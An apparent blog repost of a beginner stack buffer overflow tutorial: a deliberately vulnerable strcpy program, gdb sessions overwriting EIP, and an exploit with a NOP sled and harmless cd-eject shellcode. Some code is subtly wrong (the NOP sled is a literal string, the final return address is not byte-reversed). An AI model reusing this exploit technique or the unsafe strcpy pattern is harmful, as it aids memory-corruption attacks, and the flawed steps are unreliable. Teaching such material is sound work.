* BeEF (Browser Exploitation Framework)

A large collection of exploits as well as more common place software such as browsers. BackTrack arranges tools into 11 categories:

* Information Gathering
* Network Mapping
* Vulnerability Identification
* Web Application Analysis
* Radio Network Analysis (802.11,Bluetooth,Rfid)
* Penetration (Exploit & Social Engineering Toolkit)
* Privilege Escalation
* Maintaining Access
* Digital Forensics
* Reverse Engineering
* Voice Over IP

http://www.backtrack-linux.org/downloads

BUFFER OVERFLOW ATTACK TUTORIAL – EXAMPLE

A Buffer Overflow is a flaw by which a program reacts abnormally when the memory buffers are overloaded, hence writing over adjacent memory. It can be triggered by using inputs that may alter the way a program operates,for example <inputting a very large value in a c program which does integer based addition>. A buffer overflow can lead to program crash, memory access error, garbage outputs & worse, breach of system security. Probably, you might have seen prominent buffer overflow based exploits & attacks in Metaspl0it or any other spl0it framework. Why I am writing this ? well..I found an excellent article on buffer overflow by eXeCuTeR <executerx[at]gmail[dot]com> & thought you might wanna have a look at it. Its exlplained in quite easy language with very basic example.
read & learn…

Our vuln program:

———- bof.c ————–

#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[])
{
char str[10];
strcpy(str, argv[1]);
printf(“Done”);

return 0;
}

———- bof.c ————–

As you see, argv[1] is copied to str (str can contains 10 characters)
Try to think – What happens when we load more than 10 bytes on str? You’ll see.

Lets try compile the program and load 12 bytes:

niv@niv-desktop:~/Desktop$ gcc-3.3 bof.c -o bofniv@niv-desktop:~/Desktop$ ./bof `perl -e ‘print “A”x12′`Doneniv@niv-desktop:~/Desktop$

The program has been successfully compiled even though we loaded 12 bytes, which means 12 bytes aren’t enough to overflow the program.

Lets try to overflow the program with 14 bytes:

niv@niv-desktop:~/Desktop$ ./bof `perl -e ‘print “A”x14′`
Doneniv@niv-desktop:~/Desktop$

Failed. Again.

Lets load 32 bytes this time:
niv@niv-desktop:~/Desktop$ ./bof `perl -e ‘print “A”x32′`
Segmentation fault (core dumped)
niv@niv-desktop:~/Desktop$

In case it says: /*** stack smashing detected ***/ or something that appears to be like this error, just go to the terminal, type: sudo apt-get install gcc-3.3 and when compiling it type gcc-3.3 example.c -o example instead of gcc example.c -o example.

We made it, we overflowed the program.

Now we’ll check more further what exactly happend:

niv@niv-desktop:~/Desktop$ gdb -c core ./bof
GNU gdb 6.6-debian
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type “show copying” to see the conditions.
There is absolutely no warranty for GDB. Type “show warranty” for details.
This GDB was configured as “i486-linux-gnu”…
Using host libthread_db library “/lib/tls/i686/cmov/libthread_db.so.1″.
/home/niv/Desktop/core: No such file or directory.
(gdb) run `perl -e ‘print “A”x60′`
Starting program: /home/niv/Desktop/bof `perl -e ‘print “A”x32′`

Program received signal SIGSEGV, Segmentation fault.
0×41414141 in ?? ()
(gdb) i r eip
eip 0×41414141 0×41414141

We overwrited the EIP with A’s (A = 41 in hex) – The EIP is the Instructor Pointer, it points at the next instruction.

Now we can start writing our exploit.
Our exploit is gonna contain the NOPSLED + Shellcode + the address of the shellcode (the RET).
The NOPSLED is a chain of 0×90′s (NOPSLED = NO OPeration) so the NOPSLED will be placed before our shellcode.
The NOPSLED helps us so we don’t have to jump exactly to the place in memory where our shellcode begins.

———- exploit.c ————–
#include <stdio.h>
#include <string.h>

char exploit[2048];

int main(void)
{
int i;
/*
* (linux/x86) eject cd-rom (follows “/dev/cdrom” symlink) + exit() – 40 bytes
* – izik <izik@tty64.org>
*/
char shellcode[] =
“\x6a\x05″ // push $0×5
“\x58″ // pop %eax
“\x31\xc9″ // xor %ecx,%ecx
“\x51″ // push %ecx
“\xb5\x08″ // mov $0×8,%ch
“\x68\x64\x72\x6f\x6d” // push $0x6d6f7264
“\x68\x65\x76\x2f\x63″ // push $0x632f7665
“\x68\x2f\x2f\x2f\x64″ // push $0x642f2f2f
“\x89\xe3″ // mov %esp,%ebx
“\xcd\x80″ // int $0×80
“\x89\xc3″ // mov %eax,%ebx
“\xb0\x36″ // mov $0×36,%al
“\x66\xb9\x09\x53″ // mov $0×5309,%cx
“\xcd\x80″ // int $0×80
“\x40″ // inc %eax
“\xcd\x80″; // int $0×80

for(i = 0; i < 512; i++)
strcat(exploit, “0×90″);

strcat(exploit, shellcode);

printf(“Loaded.\n”);

return 0;
}
———- exploit.c ————–

niv@niv-desktop:~/Desktop$ gcc-3.3 exploit.c -o exploit
niv@niv-desktop:~/Desktop$ ./exploit
Loaded.

Run our vuln program so we could find the RET, the address of our shellcode.
After we run it, we’ll look for the ESP – the ESP points on the last element used on the stack.
Check this out:

niv@niv-desktop:~/Desktop$ gcc-3.3 exploit.c -o exploit
niv@niv-desktop:~/Desktop$ ./exploit
Loaded.
niv@niv-desktop:~/Desktop$ ./bof `perl -e ‘print “A”x60′`
Segmentation fault (core dumped)
niv@niv-desktop:~/Desktop$ gdb -c core ./bof
GNU gdb 6.6-debian
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type “show copying” to see the conditions.
There is absolutely no warranty for GDB. Type “show warranty” for details.
This GDB was configured as “i486-linux-gnu”…
Using host libthread_db library “/lib/tls/i686/cmov/libthread_db.so.1″.
/home/niv/Desktop/core: No such file or directory.
(gdb) run `perl -e ‘print “A”x60′`
Starting program: /home/niv/Desktop/bof `perl -e ‘print “A”x60′`

Program received signal SIGSEGV, Segmentation fault.
0×41414141 in ?? ()
(gdb) x/s $esp

You’re gonna get these things:

0xbf949694: “`???}_???o??02″
(gdb)
0xbf9496a2: “”

etc’…
Keep searching until you see something like this thing:

0xbf9496e0:”7?\224?J?\224?U?\224?i?\224?y?\224??\224?02?\224?24?\224?*?\224?3?\224???\224??\224?\v?\224?30?\224?N?\224?Y?\224?q?\224???\224??\224???\224???\224?25?\224?&?\224?;?\224?D?\224?W?\224?n?\224?v?\224?\205?\224???\224???\224?24?\224?P?\224?p?\224?}?\224?\212?\224???\224??\224?”

0xbf9496e0 is the address of our shellcode (the RET)
To make our exploit work properly, we need to overwrite the EIP with our shellcode.We’ll take our old address (0xbf9496e0) and do this thing:

Take our address and make it look this way: bf 94 96 e0
Grab the last bytes (e0) and do the following:
we’ll block the characters between \’s (slashes), add x in each block -> \xe0\
you’ll do the same to each 2 chars and then put them in order that the last bytes of our the address will be the first one in our new address:

0xbf9496e0 -> \xe0\x96\x94\xbf

Now, we are gonna reach our shellcode this way:
Since we overflowed the program with 32 bytes (32 A’s),
and our RET’s length is 4 bytes we are gonna subtract the length of our shellcode address(the RET) of the A’s,
and we are gonna print 28 A’s (32 A’s – 4 bytes (RET’s length) = 28) and the RET so we could reach the shellcode successfully.

niv@niv-desktop:~/Desktop$ ./bof `perl -e ‘print “A”x28′“printf
“\xbf\x94\x96\xe0″`